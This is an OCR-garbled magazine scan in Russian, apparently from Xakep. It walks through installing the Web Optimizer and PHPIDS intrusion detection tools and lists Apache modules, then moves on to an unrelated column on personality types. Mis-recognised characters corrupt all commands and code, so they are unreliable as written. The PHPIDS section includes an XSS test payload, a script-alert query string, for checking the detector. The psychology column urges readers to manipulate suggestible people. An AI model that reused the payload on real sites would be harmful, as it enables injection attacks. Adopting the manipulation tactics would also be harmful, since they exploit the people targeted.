Чтобы ѴѴеЪ Орйтігег смог сохранять кэшированные версии обрабо- 
танных им файлов, следует установить права на запись на файл ѵѵеЪ- 
оріітігег/сопй^.ѵѵеЬо.рІір и каталог ѵѵеЬ-орйтігег/сасЬе для пользова- 
теля, под которым работает ѴѴеЪ-сервер: 

$ зибо сЬшоб +Ѵ7 меЪ-орбітігег/сопбід.меЪо.рІтр 



► ізо 



ХАКЕР 01 /133/ 10 




[Сепегаі] 



; Ьазіс зеЪІіпдз * сизіотіге іо таке ІНе РНРІ0$ ѵ/огк а± аіі 
^І11ег_±уре = хті 



Ьазе_ра1:И = /уаг/ѵт^Щ 

изе_Ьазе_ра^И = 'Гаізе 



^і11ег_ра1И 

Ітр_ра1:Н 

зсап_кеуз 



“ сІе^аиІІМ^І-Ьег , хті 
= ітр 
= -Гаізе 



; іп сазе уои уап± Іо изе а сііі^егепі: НТМиРигіТіег зоигсе, зресііу іі: Неге 
; Ву сіеТаиІІ, ІНозе ■Гііез аге изесі ІИаІ аге Ьеіпд зНіррес! мі*Н РНРІВ5 
НТМи_РигіТіег_Ра1:Ь - ѵепсІогз/НіітІригі^іег/НТМиРигі^іег .аиЪо ,рНр 
НТМІ__Ригі - Ріег_СаеНе = ѵепсІогз/НІтІригіТіег/НТМІ-Ригі'Гіег/Ое'ГіпіѣіопСасНе/ЗегіаІігег 



; сіе^іпе ѵ/НісН -ріеісіз согѵЬаіп Н±тІ апсі пеесі ргерагаііоп Ье^оге 
; Иііііпд *Не РНРІ05 гиіез (пем іп РНРІ05 0,5) 

Ніті [ ] = Р05Т. ыузіѵ/уд 



; сіе^іпе ыНісН -ріеісіз соп*Ьаіп 350М сіаіа апсі зНоиІсІ Ье ±геа±есі аз зисН 
; Тог Теме г Таізе розіТіѵез (пем іп РНРІ05 0,5,3) 

3 зоп [ ] = Р0$Т. ізопсІаТа 



/тпТ/1ехТ/х/х_5упаск_меЬ_зегѵег_асісІоп5/СопТід. іпі.рНр[+] [рНр] 0 0x0 [14,31] [15%] 



-- ВСТАВКА -- 

РЕДАКТИРУЕМ КОНФИГ РНРШ5 



$ зисіо сЬпосі -К +Ѵ7 меЬ-орДітігег/сасйе 
$ зисіо сЬпосі -К ѵллм-сіаДа : ѵллм-сіаЦа ѵ/еЬ- 
орДітігег/сасЬе 

Все, теперь открываем страницу Ьар : //сайт /ѵѵеЪ- 
оргітігег/іпсіех.рііі в браузере и приступаем к настройке 
фреймворка. Самый простой путь — довериться системе, 
ввести логин и пароль администратора и нажать кнопку 
«Быстрая установка». ѴѴеЪ Оргітігег пройдется по цепочке 
расположенных на ѴѴеЪ-сервере файлов и создаст их закэ- 
шированные сжатые версии. Также он произведет необхо- 
димую для последующей работы системы модификацию 
оригиналов или (если они недоступны для записи) выведет 
инструкцию об их изменении. 

Нажав на оранжевую стрелку в правой стороне экрана, 
можно произвести так называемую «Обычную установку», 
которая включает в себя возможность указать опции опти- 
мизации вручную. 

РНР ІМТКиБІОЫ ОЕТЕСТІОЫ БУ5ТЕМ (РНРІ05) Многие из 
нас применяют системы обнаружения вторжений на своих 
серверах. Некоторым достаточно сетевых ГО5, другие так- 
же устанавливают и локальные, однако мало кто применя- 
ет ѴѴеЪ ГО5, предназначенные для «отлова» попыток взлома 
ѴѴеЪ-сайтов. 

РНРГО5 одна из представительниц таких систем. Это 
легкая в использовании, быстрая система обнаружения 
атак, которая умеет ловить разные видыХЗЗ, 5(2Ь-инъ- 
екции, расщепления запроса (НТТР Кезропзе 5р1ітп§), 
проходы по каталогам (Эігесгогу ітаѵегзіп^), КРЕ/ЬРІ, Бо5, 
ІГ) АР-инъекции и многое другое. Причем это не просто 
слова, а реально работающая система, которая способна 



отбить охоту взлома у 99% злоумышленников. Для сомне- 
вающихся открыта специальная страничка, перейдя на 
которую, любой желающий может попробовать обмануть 
систему. 

РНРГО5 представляет собой РНР-библиотеку, ко- 
торую следует подключать к проекту. В результате 
все входные данные попадают на ее вход, после чего 
производится их парсинг и проверка на легальность. В 
случае обнаружения попытки вторжения принимаю- 
щий данные скрипт завершается, формируется отчет и 
отсылается системному администратору (сохраняется 
на диске, отсылается разработчикам РНРШ5, вписать 
нужное) . 

Установить систему очень просто: 

1 . Скачиваем последнюю версию РНРГО5 с офсайта и распа- 
ковываем: 

$ ССІ /Дшр 

$ ѵ/деД ІіДЦр : //рЪр-ісіз . огд/:Еі1ез/р1ірісіз- 
0 . б . 3 . 1 . -Саг . Ьг2 

$ Даг -хз ѣ рйрісІз-0 . б . 3 . 1 . -Саг .Ьг2 
$ зисіо гпксііг /ѵаг/рйрісіз 
$ зисіо шѵ ІіЬ /ѵаг/рЬрісіз 
$ ссі /ѵаг/ркрісіз/ІіЬ/ІВЗ 
$ зисіо сііоѵш. -К ѵл^-сіака : ѵлллѵ-сІаЦа Дтр 

Обрати внимание, что мы намеренно установили РНРГО5 
рядом с корневым каталогом ѴѴеЪ-сервера (а не в него) . Так 
мы изолировали его каталоги от просмотра посторонними. 

2. Открываем конфигурационный файл Сопй§/Сопй§.іпі. 
рЪр и вносим в него необходимые изменения. На данном 
этапе достаточно модифицировать всего одну опцию: 




> іпіо 

• Обфускация — 



приведение исходного 
текста или исполняе- 
мого кода программы 
к виду, сохраняющему 
ее функциональность, 
но затрудняющему 
анализ, понимание 
алгоритмов работы и 
модификацию при де- 
компиляции. Другими 
словами, запутывание 
кода. 

• РЬрЗесІпіо 
[ рбрзес.ога/ргоіесіз/ 
рбрзесіпіо/) добавляет 
функцию рЬрзесіпбо, 
предоставляющую 
информацию о безо- 
пасности РНР-окру- 
жения и советы по ее 
улучшению. 
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5ѴМ/АСК 



СМ5 


ѴБІоѵѵ 


Время загрузим (с) 


Размер (Кб) 


Объекты 




До 


После 


До 


После 


До 


После 


До 


После 


БШ 8,5.1 


61 


92 


4,37 


2,21 


239 


194 


53 


28 


СМ3 Масіе Зітріе 


74 


96 


0.483 


0,375 


49 


35 


15 


5 


соде а г 1 .0 


76 


91 


5.11 


1.57 


447 


129 


11 


9 


Оаіаіііе Епдіпе 8.0 


65 


91 


4.48 


1,29 


147 


120 


43 


16 


□шраі 6.10 


72 


94 


4.8 


1.34 


102 


99 


32 


8 


ЙотЙе 1 .1 


89 


96 


0.374 


0.477 


19 


14 


7 


6 


ЕхргеззІопЕпдІпе 1 .6.8 


96 


99 


0,584 


0,257 


10 


4 


3 


2 


ІРВ 2.3.6 


67 


89 


4,38 


1 .31 


124 


52 


27 


25 


Зоотіа! 1 .0.15 


78 


92 


0.996 


0.521 


47 


39 


18 


13 


^отіа! 1 .5.1 0 


64 


94 


4.38 


1.57 


139 


73 


42 


9 


^озііпа 1 .2 


63 


91 


8.07 


3.77 


426 


333 


45 


17 


Ыѵезігееі 0.3.1 


51 


96 


10.87 


1.97 


298 


111 


43 


5 


МахОеѵ Рго 1 ,082 


75 


93 


2.4 


0,871 


51 


36 


27 


21 


МахЗЙе 0.3/! 


71 


97 


2.73 


1.12 


152 


90 


15 


5 


МООх 0.96.3 


69 


97 


2.73 


0.842 


109 


51 


18 


4 


ОрепЗІаегі 1 .2 


77 


83 


5.51 


3.37 


257 


250 


92 


72 


озСоттегсе 2.2 


77 


93 


3.05 


1.24 


72 


65 


31 


31 


РНР-Ыике 8.0 * 


72 


91 


2.785 


1.272 


181 


91 


19 


19 


рИрВВ 3.0,4 


72 


95 


0,651 


0,305 


85 


71 


19 


7 


8МР 1 .1 .8 ” 


61 


91 


2.68 


1.72 


183 


132 


63 


25 


ТехіраЙегп 4.0.8 


92 


97 


1.26 


0.823 


8 


5 


4 


4 


ІІМІ.СМ5 2.7 


58 


93 


4.52 


2.89 


269 


177 


59 


10 


ѵБиІІеип 3.8.3 


70 


92 


3.33 


1.81 


124 


67 


20 


14 


ѴѴеЬзЙе Баке г 2.6 


77 


95 


1.51 


0.47 


17 


12 


10 


8 


ѴѴогфгезз 27.1 


72 


95 


4.58 


2,08 


133 


125 


31 


6 


Хагауа 1 .1 .5 


81 


97 


1.79 


0.78 


35 


16 


8 


4 


ХООРЗ 2.3.3 


72 


95 


3.22 


1.53 


65 


50 


21 


8 



ЗАМЕРЫ ПРОИЗВОДИТЕЛЬНОСТИ ѴѴЕВ-САЙТА С УСТАНОВЛЕННЫМ 
ѴѴ ЕВОРТІМІ2ЕК 



Ъазе_рабЪ. = /ѵаг/ркрібз/ІіЪ/ІВЗ 



$ зисіо ѵі /ѵаг/ѵѵѵѵѵѵ/рЬрісіз.рЬр 

зеб_іпс1ибе_рабЪ. ( 
деб_іпс1ибе_рабЪ. ( ) 

. РАТН_ЗЕРАКАТОК 



. ' /ѵаг/ркрібз/ІіЪ' 

) ; 

іб ( ! зеззіоп_іб ( ) ) { 
зеззіоп_збагб ( ) ; 

} 

гедиіге_опсе ' ІВЗ/Іпіб .ркр ' ; 
Ьгу { 

/* 

* Что будем сканировать? 



Все остальные поля файла можно оставить 
неизменными, РНРГО5 и в базовой конфигура- 
ции работает на пять с плюсом. 

3. Создаем файл рйрісіз.рЬр в корневом 
каталоге ѴѴеЪ-сервера и записываем в него 
следующее: 



$гедиезб = аггау ( 

'КЕОІШЗТ' => $_КЕ01Ш8Т, 
'СЕТ' => $_СЕТ , 

'РОЕТ' => $_РОЗТ, 
'СООКІЕ' => $_СООКІЕ 



$іпіб = ІВ8_Іпіб : : іпіб (бігпате ( 

ЕІЬЕ ) . ' /ѵаг/рЬрібз/1іЬ/ІВ8/ 

Сопбід/Сопбід . іпі . рйр 1 ) ; 

/* 

* Инициализируем РНРІВ8 и читаем 
результаты проверки 

*/ 

$ібз = петл ІВ8_Мопібог ( $гедиезб , 
$іпіб) ; 

$гези1б = $ібз->гип() ; 

/* 

* Если обнаружена атака — заносим 
результат в логи и завершаем работу 

*/ 

Ш ( ! $гези1б->ізЕтрбу ( ) ) 

{ 

есбю $гези1б; 

гедиіге_опсе ' ІВЗ/Ьод/ЕіІе . рйр 1 ; 
гедиіге_опсе 

' ІВЗ/Ьод/Сотрозібе .рйр ' ; 

$сотрозібеЬод = пем 

ІВ8_Ьод_Сотрозібе ( ) ; 
$сотрозібеЕод->аббЬоддег ( ІВ8_ 
Еод_Еі1е: : дебіпзбапсе ( $іпіб ) ) ; 

$сотрозібеЬод->ехесибе ( $гези1б ) ; 

біе ( ' Аббаск бебесбеб 1 ) ; 

} 

} 

4. Чтобы РНРГО5 проверял все наши РНР- 
скрипты, добавим файл рйрісіз.рЬр к каждому 
из них. Для этого откроем рйр.іпі и внесем в 
него следующую строку: 

аибо_ргерепб_бі1е /ѵаг/ѵѵѵш/рітрібз .рЬр 

То же самое можно сделать при помощи 
.Ьтссезз: 

рйр_ѵа1ие аибо_ргерепб_бі1е /ѵаг/ 
ѵллпл/ркрібз . рйр 

5. Перезапускаем апач: 

$ зибо /ебс/іпіб . б/арасйе2 гезбагб 

Это все. Теперь можешь протестировать 
РНРГО5, набрав в адресной строке браузера 
что-нибудь вроде "Ьббр: //сайт/рітрібз .рЬ. 
р?безб=%22%ЗЕХХХ%ЗСзсгірб%ЗЕа1егб (1 
) %ЗС/зсгірб%ЗЕ". 
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Настройка Веб Оптимизатора 


. 0 . 4 . 8 / 0 . 4.9 

ѵѵеЬ оріітігег 




1 2 ® 





Установка - шаг третий 

Как нужно изменить ваш(и) файл(ы): 

1 . 8 самое начало файла ♦ « * /ішіех . рЬр добавить: 



ОрЬр 

гедиіг е Г * * . / ѵеЪо/ , орс ігоігег , рЬр 1 ) ; 
?> 


А 


8 файл .../іпйех.ріір после строгая 


ЗЬ->с1озе О ; 


А 


добавить 


$ѵеЬ_оръііиігег->*іііізЬО ; 


1 



Конфигурация сохранена 
Ускорение сайта проведено 



Необходимые изменения 



Дополнительное ускорение 
Безопасность 




ЕСЛИ ѴѴЕВ0РТІМІ2ЕК НЕСМОЖЕТ САМОСТОЯТЕЛЬНО ОТРЕДАКТИРОВАТЬ ФАЙЛЫ, ПРИДЕТСЯ СДЕЛАТЬ 
ЭТО ВРУЧНУЮ 




СТАНДАРТНАЯ УСТАНОВКА ѴѴЕВ 
0РТІМІ2ЕР ПОЗВОЛЯЕТ ПРОИЗ- 
ВЕСТИ ТОНКУЮ КОНФИГУРАЦИЮ 
СИСТЕМЫ 



ИНТЕРЕСНЫЕ АРАСНЕ-МОДУЛИ Этот 
раздел посвящен сторонним Ар асЬе -модулям, 
которые ты можешь скачать из интернета и 
подключить к своему ѴѴеЪ-серверу. Среди них 
есть как известные и повсеместно используе- 
мые модули, так и необычные проекты. 

• тоб_соппесгіоп_1іті1: Гсобе.^оо^іе.сот/р/ 
тоб-соппесгіоп-іітіі:) — ограничение на 
одновременное количество подключений к 
ѴѴеЪ-серверу. 



•тосі ѵЬо5Г Нтіс ГарасЬе.іѵп.с ) — индивиду- 
альный контроль пропускной способности и 
количества подключений для каждого вирту- 
ального хоста. 

•тосПрепѵ Г тоб-ірепѵ. зоигсеГог^е . пег) — 

установка и снятие переменных окружения на 
основе ІР-адресов и ЭЫ5-имен клиентов. 

• тоб_ассе5§_бп5Ы ( ■■■ тѵілл/щрасЬесопзикапсу. 
сот/тобиіез/тоб ассезз бшЫ) — контроль 
доступа, основанный на черных и белых спис- 
ках ЭЫ5ВЬ. 

•тоб_с1іі5і:ег ГіЪо55.ог^/тоб сіизіег) — дина- 
мический балансировщик нагрузки. Требует 
тоб_ргоху. 

•тоб_до5 — реализация ОоЗ Стоб-до5. 
зоигсеГог^е.пегТ возможность использования 
разных приоритетов обработки в зависимости 
от типа запроса. 

•тоб_сарі:сЬа Г зоигсе&г^е.пег/ргоіесЩ/тоб- 

саргсЬа) — реализация капчи в виде АрасЬе-мо- 
дуля. Для своей работы требует библиотеки СЭ 
2.хиВегке1еуЭВ 4.5. 



• тоб-Змб^ЬгтІ ( ііоѵебаетоп.пеіі/ііапаі/ 
арасЬе/тоб зѵуіЗЬізпГ) — конвертирует 
$ѵѵТ-файлы в НТМЬ для того, чтобы они 
могли быть проиндексированы поисковыми 
машинами. 

•тосЦхі: Г арасЬе.уѵеЬгЫп^.сот/тоб ЕхЕ) — 

показывает текстовые файлы, добавляя к ним 
хидер и футер (также, как это сделано при 
отображении каталогов) . 

• тоб_ѵа1ібаі:ог Гараске.шеЪгЫп^.сот/тоб 

уаИбаШі) — валидатор НТМЬ, ХМЬ и 5СМЬ. 

• тоб_Ъа5Ь Г \Агтѵ.аий5йсі.огу/Ъакипіп/ 

тоб ЬазЮ — интерпретатор Ъазк, встроенный 
вАраске. 

ЧТО ЕЩЕ? Рассмотренные в статье обвески 
далеко не все, что было придумано ѵѵеЪ-раз- 
работчиками и программистами в облас- 
ти разгона и защиты ѴѴеЪ-сервера. При 
должном терпении на просторах интернета 
ты сможешь найти массу проектов, которые 
позволят твоему серверу выдерживать 
большие нагрузки и самые изощренные 
типы атак, т 
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ЛОЗОВСКИЙ АЛЕКСАНДР І_020Ѵ5КѴіа0АМЕІ_АМ0.Ки 



РЗУСНО: 

УЯЗВИМЫЕ ЛИЧНОСТИ 

руководство по эксплуатации 

«Население Берлина - это на 50% акцентуированные личности и на 50% - стандартный тип людей». 

Карл Леонгард, немецкий психиатр 



По нашему глубокому убеждению, настоящий хакер является тако- 
вым нетолько передэкраном монитора. Хакер — он во всем хакер, это 
человек, который мыслит круто, мыслитнестандартно, во всем ищет 
недокументированные возможности и ходиткороткими, тайными, 
непротореннымитропами. Очередная статья из нашей рубрики обе- 
щаетинформационный подгон именнотаким комрадам — 
сейчас мы рассмотрим, какие на свете бывают типы личности, чем 
они друг от друга отличаются икаксними нужно правильно взаи- 
модействовать. 



Д ля начала припомним, какие близкие 
темы мы уже поднимали в рамках этой 
рубрики. Манипуляции межличност- 
ные и манипуляции массовые? Было 
такое — сентябрьский номер за про- 
шлый год. Общая теория безумств? Пожалуйте 
в июньский номер за тотже год, может при- 
годиться (почему — узнаешь чуть позже). Про 
обманы и кидаловотоже, вроде бы, писали — 
открывай т за декабрь. Все эти статьи рас- 
сказал и тебе о том, как душевно здоровые люди 
обманывают друг друга, внушают мотивации, 
заставляя изменять стремления ижелания, 
а также — чем отличаются люди душевно 
здоровые от душевно больных. В этой статье мы 
рассмотрим людей не совсем здоровых, но и не 
совсем больных, что очень актуально — таких 
людей великое множество. Скорее всего, их 
немало и втвоем прямом окружении, просто до 
этого момента ты не знал, почему они такие, кто 
в этом виноват и что с этим можно сделать. 

Немного теории 

Кстати, с теорией у меня возникаетнефиговый 
диссонанс. Сделаешь в статье мало загруза, 
так редактор рубрики возмутится — дескать, что 
это за банальности да жизненный опыт, где же 
тут психологическая составляющая, скрытые 
рычаги управления человеком и т.д.? Прогру- 
зишь читателя по полной программе —такой, 
читатель, в отместку проспамит меня чем-то 



вроде: «это что такое, учебник, что ли?Учебни- 
ков мне в институте хватает, я т не для этого 
покупаю» :). Нуда ладно, не буду жаловаться, а 
лучше попробую найти золотую середину. 
Акцентуация — особенностьличности 
человека (по большей части врожденная), 
обуславливающая некоторую «оригиналь- 
ность» его поведения, избыточную выражен- 
ность некоторых чертего характера (например, 
замкнутость, внешняя безэмоциональность, 
педантизм, избыточная демонстративность и 
веселость) и уязвимость котдельным психоген- 
ным воздействиям при нормальной устойчиво- 
сти к другим. Акцентуация представляет собой 
психологическую норму, акцентуированных 
людей тысячи, поэтому никогда не будет 
лишним познакомиться сосновнымитипами 
акцентуаций и узнать, какс ними правильно 
взаимодействовать. 

Расстройство личности — по сути та же фигня, 
что и акцентуация, но выраженная до такой 
степени, что начинает мешать нормальной 
социальной жизни человека, дезадаптируя, 
делая его неприспособленным кнормальной 
жизни (неспособным толком позаботиться о 
себе или вовсе социально опасным). Раньше в 
нашей стране расстройства личности называли 
психопатиями, а страдающих ими личностей, 
какэто ни странно, психопатами. Бучение о 
психопатиях огромный вклад внес отечествен- 
ный психиатр Ганнушкин, его труды на эту тему 



ты совершенно бесплатно можешь почитать на 
рзѵсЫаІхѵ.ги (шикарная онлайн-библиотека, 
советую посетить). 

Ниже мы стобой разберем основныетипы ак- 
центуаций/психопатий, но сначала — неболь- 
шой дисклэймер. Во-первых, этихтипов «в 
чистом виде»ты практически не встретишь, 
жестко классифицируются они исключи- 
тельно для удобства изучения. Во-вторых, 
выраженность этих расстройств очень сильно 
варьируется от человека к человеку — возь- 
мем, к примеру, социальную отгороженность 
при шизоидной акцентуации, ведь она может 
варьироваться от простой нелюбви к большим 
компаниям и задушевным разговорам до 
тотальной изоляции, ужасной молчаливости и 
полного домоседства. При этом главное пом- 
нить: акцентуация — это «краски здоровой 
личности». То, что принято называть «осо- 
бенностями характера, сильными и слабыми 
сторонами личности». Психопатии — оттого 
и содержат «-патии», что это не вполне здо- 
ровое состояние. Проще говоря, акцентуанты 
могут счастливо акцентуировать до старости 
и прожить отличную жизнь, меняя акценты 
по ходу дела. Психопат (не в обывательском, 
а в медицинском смысле) рано или поздно 
попадет по адресу. К психиатру. Потому что 
таблеток, способных изменить личность, 
пока не придумали. И надеюсь, не придумают 
никогда :). 
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Уверен, что большинство акцентуированных личностей ты найдешь 
на этой картинке 



Здравствуйте, 
я — веселая и 
компанейская 
тусовщица- 
истеричка 

Ой, как классно! Пойдем, потусу- 
емся? Сегодня в клубешнике будет 
много русских водок, рок-секс- 
шоу, треш, угар и содомия, прямо 
каквчераІУ меня еще былотакое 
классное платьице, я вчера была 
буквально королевойтанцпола! На 
меня все смотрели! А еще у меня 
в о « в ко нта кти ке » е сть даже та ка я 
аватара с короной, классно, да? 
Неинтересно? Да кто ты такой? 
Даты что вообще себе думаешь? 

На себя посмотри — урод, кретин, 
недоносок! 

Очень весело. У нас, в рубрике 
Рзусбо, это называется гистрион- 
ным (истероидным] расстройством 
личности. Ладно, отвлечемся от 
прекрасных дам. Представь себе 
эдакого весельчака, который 
любит привлекать к себе внима- 
ние, любитбыть душой общества 
и центром всеобщего поклонения, 
фонтанирует положительными 
эмоциями и, казалось бы, нет 
ничего такого, что могло бы повер- 
гнутьего вуныние. Позитивчик? 
Нестрашно, и для этого врага скуки 
мы найдем «диагноз» и выявим 
его слабые стороны. Начнем с 
выявления. Предлагаютвоему 
вниманию более чем научные 
критерии этого расстройства: 

• Склонность ктеатрализации и 
преувеличенно мощному выраже- 
нию СВОИХЭМОЦИЙ; 

• Легкая внушаемость; 

• Стремление ксозданию кипучей 
деятельности, результатом которой 
будетпомещениеуказанной пер- 
соны в центр всеобщего внимания; 

• Эмоциональность (причем 
эмоции эти неглубоки и могут 



довольно быстро меняться под 
влиянием внешних факторов]. 
Осознал? Ключевые слова: ра- 
дость, веселье, обаяние, эгоцен- 
тризм, быть в центре внимания, 
обольщать. Такие люди живут 
весьма легко, склонны к манипу- 
лированию окружающими, готовы 
добиваться желанной ответной 
реакции отлюдей из своей компа- 
нии любыми средствами. Обрати 
внимание на такое качество, как 
внушаемость — это и есть ключ к 
психологии подобных персонажей. 
Веди себя так, какони оттебя этого 
ожидают — восхищайся, улыбайся, 
превозноси, говори кучу компли- 
ментов (переборщить практически 
невозможно], и ты будешь их 
лучшим другом (правда, напомню, 
что эмоции у них довольно по- 
верхностны и изменчивы, поэтому 
дружба может продлиться весьма 
недолго]. Куй железо, не отходя 
от кассы, манипулируй, внушай 
своюточку зрения, навязывай 
мотивации. Но нетормози — их 
расположение изменчиво. 

Не хочу. Неинте- 
ресно. Скажи, что 
меня нет дома 

Да, это — шизоидное расстрой- 
ство личности, которое, какты 
помнишь из прошлых статей, ника- 
кого отношения к шизофрении не 
имеет. Тут все просто: представь до 
отказа замкнутого в себе нерда- 
компьютерщика, и ты сможешь 
найти в нем все признаки шизоид- 
ного расстройства личности. Это 
эмоционально холодный и самодо- 
статочный индивид. Интроверт, 
которого, казалось бы, невоз- 
можно вывести из эмоционально 
холодного состояния никакими 
раздражителями — ни позитив- 
ным, ни негативным неудается 



вызвать бурный гнев или бурную 
радость. Так они и живут — 
в мире своих фантазий, своих вну- 
тренних переживаний и своихже 
собственных (нередко — весьма 
оригинальных и причудливых] 
интересов. Нетрудно догадаться, 
что именно благодаря этой сосре- 
доточенности на интересах немало 
известных, многого добившихся 
ученых (обычно — теоретики] или 
людей искусства было шизои- 
дами. Окружающие раздражают 
шизоида своей навязчивостью, 
он старается не впускать их в свой 
внутренний мир. Выраженность 
этих проявлений меняется от 
человека к человеку и от акцентуа- 
ции к расстройствуличности, но 
симптомы остаются теми же: 

• Эмоциональная холодность к 
окружающим; 

• Ранимость, чувствительность к 
тому, что значимо для него лично; 

• Самоизоляция отобщества; 

• Пассивное неприятие социаль- 
ных правил, норм и принципов (то 
есть, не активное вооруженное со- 
противление, а простой пофигизм, 
связанный с полным отсутствием 
интереса ко всем этим услов- 
ностям. Иначе говоря, заставить 
ходить на работу выраженного 
шизоида будет непросто); 

• Серьезная увлеченность соб- 
ственными интересами, нередко 
приводящая ксозданию гениальных 
и смелых произведений искусства :). 
Кстати, шизоидный психопат 
вовсе не обязан быть кристаль- 
но счастливым в рамках своего 
внутреннего мирка — часто он 
испытываетопределенное огорче- 
ние, печаль оттого, что он не может 
общаться так, как это делают все 
нормальные люди. 

Какже с ними взаимодействовать? 
Каквидно из описания, законта- 



чить с продвинутым шизоидом 
можно только путем присоедине- 
ния кего интересам. О которых, 
кстати, тебе может быть очень 
трудно узнать. «Родственную 
душу» шизоид вполне может допу- 
стить в пределы своего периметра, 
но учти, что общаться с человеком, 
который слабо умеет общаться в 
принципе, довольно тяжело. 

Неаккуратненько- 
то как. Кругом 
одни раздолбаи, 
один я компетен- 
тен 

Опятьже обратимся креалиям, а 
точнее — к нашим коллегам. Ну-ка, 
кто из них следует целому своду 
правил, весь из себя педант, со всей 
тщательностью раскладывающий 
канцелярские принадлежности, по 
линеечке выравнивающий ярлыки 
на рабочем столе и день-в-день 
соблюдающий все поставленные 
сроки? Это он, это он — обсессивно- 
компульсивный психопат. Человек, 
который подсознательно боится 
оказаться некомпетентным, «не мо- 
гущим», «неспособным». Защитой 
от этого страха и является огоражи- 
ваниесебя всем перечисленным. 
Данного дяденьку (а то и тетеньку], с 
его точки зрения, окружают сплош- 
ные раздолбаи и некомпетентные 
личности, но, честно говоря, я 
бы его за это не осуждал — ведь 
таконо и есть на самом деле :].А 
разтаконо и есть, то какотличить 
акцентуата/психопата отобычного 
человека? Обычные люди тоже на 
работе задерживаются, тоже ругают 
раздолбаев.тоже могут соблю- 
датьсроки. Обычные люди имеют 
смелость проститьошибкусебе и 
другим. Имеют чувство юмора, что- 
бы посмеяться над случайностью, и 
достаточно расслаблены, чтобы не 
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В левом верхнем углу (правый разворот) — типичный «зависимый» — 
Хоботов 



интересоваться, почемуты такдолго просидел 
в туалете, когда по расписанию на это отведено 
только 3 минуты. 

ОКП превыше всего ценит контроль. Контроль 
над всем и вся. Поэтому если ты застрял в лиф- 
те, утебя понос илитебя сбила машина — все 
равно виноват сам знаешь кто. Нечего заходить 
в лифт, который собирается застрять, пить пиво 
с неправильной закуской и переходитьдорогу. 
Вот он всегда ходит по лестнице, есттолько 
свежеприготовленную яичницу и на работу до- 
бирается на служебной машине. Поэтому с ним 
ничего такого не может случиться в принципе. А 
ты, раздолбай... ну и такдалее. В общем, ты все 
испортил и будешь наказан. Да, когда станешь 
драить палубу, не забудь кресла расставить 
на правильном расстоянии по правильной 
линии. А то сам знаешь. 

Вся жизнь — игра. 
Правила — для того, 
чтобы их нарушать 

Про асоциальное расстройство личности я 
писал во врезке к прошлой статье («Луч света на 
темные стороны фрауда», декабрьский т ) , 
поэтому буду краток. Во-первых, раньшетаких 
людей совершенно незря называли «социопа- 
тами» и «аморальными личностями» (разуме- 
ется, в случае выраженного расстройства). 
Человек, гордо носящий знамя асоциального 
расстройства, не придаетособенного значения 
окружающим. Они — пешки вето игре. Либоон 
использует их (манипуляциями, принуждением, 
обманом, насилием), либо соглашается с тем, 
что некоторые люди тоже представляют собой 
реальную силу, и потому лучше их оставить в 
покое. Возможно, временно. Асоциальный 
психопатагрессивен, безжалостен, неред- 
ко — хитер, не считается с чужим мнением и 
не интересуется чужими желаниями (то есть, 
до крайности эгоцентричен). Уважения к со- 
циальным правилам и нормам они совершенно 



не испытывают, причем, в отличие отшизоидов, 
активно их нарушая — просто потому что эти 
правила написаны недля них, а для некоего 
человеческого «стада». Жестко звучит? Не- 
много жестко, радует одно — таких прожженных, 
тяжелых психопатов немного (по большей части 
они померли либо пустили корни втюрьмах и 
дурдомах). Чаще ты будешь иметь дело с акцен- 
туированными в этом направлении личностями, 
а поэтому все вышеуказанные проявления 
смело дели натрое:умеренная агрессия, эмо- 
циональная холодность, эгоизм, склонность к 
нарушению и безобразиям — незаконным зара- 
боткам, мелкому мошенничеству, пересечению 
«двойной сплошной» и потоптанию муравей- 
ников. Да, совсем забыл — если тебе вдруг 



показалось, что я описал какого-то монстра 
вроде Франкенштейна, тознай — это нетак. 

Я описал оченьуспешного человека, который 
пользуется популярностью у противоположного 
пола, зарабатываетнеплохие деньги и, вообще, 
многого добивается в этой жизни (разумеется, 
речь идет не о психопатии, а об акцентуации). 
Что, теперьты испытал некоторую зависть к 
описанному мнойтипчику? Расслабься, есть 
и плохие новости: «хищнический» подход к 
жизни вызывает противодействие со стороны 
окружающих и активную конкуренцию со сторо- 
ны других хищников, обуславливая порядочный 
риск: бизнесы проваливаются, рискованные 
планы терпят крах, а хитрые мошеннические 
схемы разрушаются поддействием нелепых 
случайностей. Оглянись вокруг, посмотри на 
людей, подумай, иты поймешь, почемуя прав. 
Как взаимодействовать? С трудом. Как я уже 
говорил, подобные личности — «хищники», и 
определенноеуважение они испытываюттоль- 
ко ктаким же «хищникам» (т.е. клюдям, которые 
потенциально могут быть для них опасными — в 
психологическом и/или физическом плане). 
Если ты не крепоктелом и духом, не готов от- 
вечать на манипуляцию — контрманипуляцией, 
на насилие — насилием (хотя бы потенциально) 
и на грубость — грубостью, лучше избегать по- 
добныхтоварищей, сглаживая «острыеуглы» 
в общении с ними. Желательно аккуратно, без 
ущерба для собственного достоинства. 

Кругом враги, 
обманщики и бесчестные 
джентльмены 

Параноидное расстройство — это еще не 
паранойя и не бред преследования, о котором 
мы писали ранее ( ѵѵѵѵѵѵ.хакер.ги/тадагіпе/ 
ха/1 27/132/1 .азр ). Наш «параноик» просто 
никому не доверяет. И всех в чем-то подозре- 



В центре, междутерминатором и мальчишкой, находится типичный 
нарцисс 
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вает. Обмануть норовят, обвесить, 
напарить, нагнуть. Либо — просто 
считает, что люди относятся к нему 
нетакхорошо, как кдругим людям, 
и не идут навстречу тогда, когда 
другие идут навстречу друг другу 
(что довольно логично ;)). 

Эти люди вполне поддаются 
переубеждению и логической 
коррекции своихутверждений, но 
только в рамках каких-то конкрет- 
ныхточекзрения. В целом же такой 
человеккакбыл недоверчивым, 
таки останется. Как считал, что он 
заслуживает лучшего отношения 
со стороны других людей, так и 
будет считать. Ничего сэтим не по- 
делаешь. Формируется замкнутый 
круг — как человек относится к 
окружающим, такони относятся 
к нему. Он выглядит неприятным 
человеком — они не идут к нему 
навстречу — его отношение еще 
больше портится, достигая со 
временем уровня городской ка- 
нализации и затрудняя всяческое 
продуктивное общение с окружаю- 
щим социумом. 

Как взаимодействовать? Взаимо- 
действовать можно, какя говорил 
выше, акцентуированная в этом 
отношении персона просто чуть 
более подозрительна по срав- 
нению с обычным человеком. Не 
обижайся на его требования каких- 
либо доказательств, показывай 
своеудостоверение озеленителя 
Луны в раскрытом виде, держи 
до тех пор, пока он не перепишет 
его серийный номер, предостав- 
ляй необходимые ему в качестве 
доказательств бумаги и устные 
отзывы вызывающихдоверие 
людей. Может быть, друзьями вы и 
не станете, но общее дело сделать 
окажетесь способны. 

Чем более выраженной будет эта 
акцентуация, тем более подо- 
зрительным будет субъект и тем 
сложнее тебе убедить его в своих 
благих намерениях. Соответствен- 
